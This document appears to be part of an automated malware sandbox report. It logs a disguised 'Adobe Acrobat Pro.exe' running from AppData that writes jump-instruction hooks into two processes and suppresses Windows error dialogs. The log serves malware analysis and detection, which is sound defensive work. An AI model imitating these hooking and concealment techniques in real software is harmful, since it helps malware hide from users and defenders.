Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 5F30008 value: E9 8B 8E FE 70	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 76F18E90 value: E9 80 71 01 8F	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 5F40005 value: E9 8B 4D CB 6F	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 75BF4D90 value: E9 7A B2 34 90	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 5F50005 value: E9 EB EB CB 6F	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 75C0EBF0 value: E9 1A 14 34 90	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 5F60005 value: E9 8B 8A 07 6F	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 74FD8A90 value: E9 7A 75 F8 90	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 5F70005 value: E9 2B 02 09 6F	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 75000230 value: E9 DA FD F6 90	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 5EA0005 value: E9 8B 2F 06 71	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 76F02F90 value: E9 7A D0 F9 8E	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 5EB0007 value: E9 EB DF 08 71	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 76F3DFF0 value: E9 1E 20 F7 8E	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 5EC0005 value: E9 2B BA 00 71	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 76ECBA30 value: E9 DA 45 FF 8E	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 5EE0008 value: E9 8B 8E 03 71	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 76F18E90 value: E9 80 71 FC 8E	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 5EF0005 value: E9 8B 4D D0 6F	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 75BF4D90 value: E9 7A B2 2F 90	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 5F00005 value: E9 EB EB D0 6F	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 75C0EBF0 value: E9 1A 14 2F 90	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 5F10005 value: E9 8B 8A 0C 6F	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 74FD8A90 value: E9 7A 75 F3 90	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 5F20005 value: E9 2B 02 0E 6F	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 75000230 value: E9 DA FD F1 90	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 5EB0005 value: E9 8B 2F 05 71	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 76F02F90 value: E9 7A D0 FA 8E	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 5EC0007 value: E9 EB DF 07 71	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 76F3DFF0 value: E9 1E 20 F8 8E	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 5ED0005 value: E9 2B BA FF 70	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 76ECBA30 value: E9 DA 45 00 8F	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 5F00008 value: E9 8B 8E 01 71	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 76F18E90 value: E9 80 71 FE 8E	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 5F10005 value: E9 8B 4D CE 6F	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 75BF4D90 value: E9 7A B2 31 90	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 5F20005 value: E9 EB EB CE 6F	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 75C0EBF0 value: E9 1A 14 31 90	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 5F30005 value: E9 8B 8A 0A 6F	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 74FD8A90 value: E9 7A 75 F5 90	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 5F40005 value: E9 2B 02 0C 6F	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 75000230 value: E9 DA FD F3 90	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
